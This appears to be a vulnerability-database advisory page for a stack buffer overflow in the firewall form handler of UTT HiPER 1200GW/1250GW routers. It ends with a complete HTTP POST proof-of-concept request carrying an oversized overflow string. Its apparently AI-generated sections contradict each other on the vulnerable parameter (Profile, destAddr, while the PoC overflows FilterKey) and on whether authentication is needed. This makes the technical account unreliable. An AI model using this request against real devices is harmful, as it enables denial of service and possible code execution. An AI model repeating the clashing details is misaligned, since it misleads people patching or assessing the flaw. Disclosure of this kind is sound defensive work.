VYPR
High severity 8.8 · NVD Advisory · Published Jun 1, 2026

CVE-2026-10293

Description

UTT HiPER 1200GW and 1250GW routers are vulnerable to stack-based buffer overflow via the Profile parameter in formFireWall, allowing remote exploitation.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

A stack-based buffer overflow vulnerability exists in UTT HiPER 1200GW devices up to version 2.5.3-170306 and HiPER 1250GW devices up to version v3.2.7-210907-180535. The flaw is an unchecked strcpy call in the handler for the /goform/formFireWall endpoint, reached when it processes the Profile argument. User-controlled data is copied into a fixed-size buffer without length validation, which causes the overflow [1].

Exploitation

An attacker can exploit this vulnerability remotely by sending a crafted POST request to the /goform/formFireWall endpoint. The request must manipulate the Profile parameter with a string longer than the allocated buffer. Authentication is required, as indicated by the Authorization header in the provided Proof of Concept [1].

Impact

Successful exploitation of this vulnerability can lead to a denial of service (DoS) by crashing the affected service or device. Depending on the specific overflow conditions and system architecture, it may also be possible to achieve arbitrary code execution, though this is not explicitly detailed in the available references [1].

Mitigation

Patched firmware versions are not explicitly mentioned in the available references. Users are advised to check the vendor's website for updated firmware. As of the publication of this CVE, no specific mitigation or workaround has been disclosed beyond updating the firmware when available [1].

AI Insight generated on Jun 1, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The function strcpy copies user-controlled data into a fixed-size buffer on the stack without checking the data's length."

Attack vector

An unauthenticated attacker can send a specially crafted POST request to the /goform/formFireWall endpoint. This request includes an overly long string in the 'destAddr' parameter. The vulnerability is triggered when this long string is copied using strcpy, leading to a stack-based buffer overflow [CWE-121]. Remote exploitation is possible as the attack does not require any authentication or user interaction [ref_id=1].

Affected code

The vulnerable code is a strcpy call within /goform/formFireWall. User-controlled data from the 'destAddr' parameter is copied to a buffer at offset 216 within a configuration structure without any length validation, which allows the buffer to overflow [ref_id=1].

What the fix does

The patch is not provided in the bundle. The advisory indicates that the vulnerability is caused by the use of strcpy without bounds checking when handling user-supplied input for the 'destAddr' parameter [ref_id=1]. A proper fix would involve implementing length validation before copying the data or using a safer string copying function like strncpy.
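The two remedies named above behave differently at the boundary: strncpy on its own stops the overflow but leaves the field without a terminator when the input fills it, while a length check rejects oversize input outright. The C sketch below is an added example, not vendor code or code from the referenced advisory; the structure layout, the 64-byte field size and all function names are assumptions, with only the offset 216 taken from the page.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define FIELD_SIZE 64            /* assumed size; the page gives only the offset */
struct fw_profile {              /* hypothetical layout, not the firmware's */
    char header[216];            /* stand-in for whatever precedes offset 216 */
    char dest[FIELD_SIZE];       /* fixed-size destination of the copy */
    unsigned guard;              /* neighbouring data an overflow would clobber */
};

/* strncpy alone: bounded, but leaves dest unterminated when the input fills it. */
void copy_strncpy_only(struct fw_profile *p, const char *value)
{
    strncpy(p->dest, value, sizeof p->dest);
}

/* Validate first, then copy: oversize input is rejected, never truncated. */
int copy_checked(struct fw_profile *p, const char *value)
{
    size_t n = strlen(value);
    if (n >= sizeof p->dest)
        return -1;               /* caller should answer with an error */
    memcpy(p->dest, value, n + 1);   /* n + 1 includes the terminator */
    return 0;
}

/* Runs one copy on a constructed input of len 'A' bytes (len < 512). Returns
   0 stored and terminated, -1 rejected, 1 stored unterminated, -2 guard hit. */
int try_copy(size_t len, int use_checked)
{
    static char input[512];
    struct fw_profile p = { .guard = 0xA5A5A5A5u };
    memset(input, 'A', len);
    input[len] = '\0';
    if (use_checked && copy_checked(&p, input) != 0)
        return p.guard == 0xA5A5A5A5u ? -1 : -2;
    if (!use_checked)
        copy_strncpy_only(&p, input);
    if (p.guard != 0xA5A5A5A5u)
        return -2;
    return memchr(p.dest, '\0', sizeof p.dest) ? 0 : 1;
}

int main(void)
{
    printf("300 bytes: checked=%d strncpy=%d\n", try_copy(300, 1), try_copy(300, 0));
    return 0;
}
```

An unterminated field is a latent bug of its own, since any later strlen or %s on it reads past the field, so the rejecting variant is the safer default for a request handler.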

Preconditions

  • network: The target device must be accessible over the network.
  • input: The attacker must be able to send a POST request to the /goform/formFireWall endpoint with a manipulated 'destAddr' parameter.

Reproduction

POST /goform/formFireWall HTTP/1.1
Host: 192.168.1.1
Content-Length: 1822
Cache-Control: max-age=0
Authorization: Digest username="admin", realm="UTT", nonce="91350026511f147977ce8ea9363e038c", uri="/goform/formArpBindGlobalConfig", algorithm=MD5, response="3c90b3b4d198905f88cf1301ff8ad6b5", opaque="5ccc069c403ebaf9f0171e9517f40e41", qop=auth, nc=000001a1, cnonce="71e33390dc75c484"
Origin: http://192.168.1.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.1/IPMac.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zhcn; utt_bw_rdevType=; td_cookie=9472310938
Connection: close

newname=testpolicy&oldname=oldpolicy&applyuserType=1&applyuserData=testdata&index=0&PolicyNames=testpolicy&PolicyEnables=1&ip1=192.168.1.1&ip2=192.168.1.100&destAddr=somedomain.com&destIP=ipRange&timeGrpName=always&note=test&Status=1&FilterTypes=2&FilterKey=AAAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Action=add [ref_id=1]

Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

5
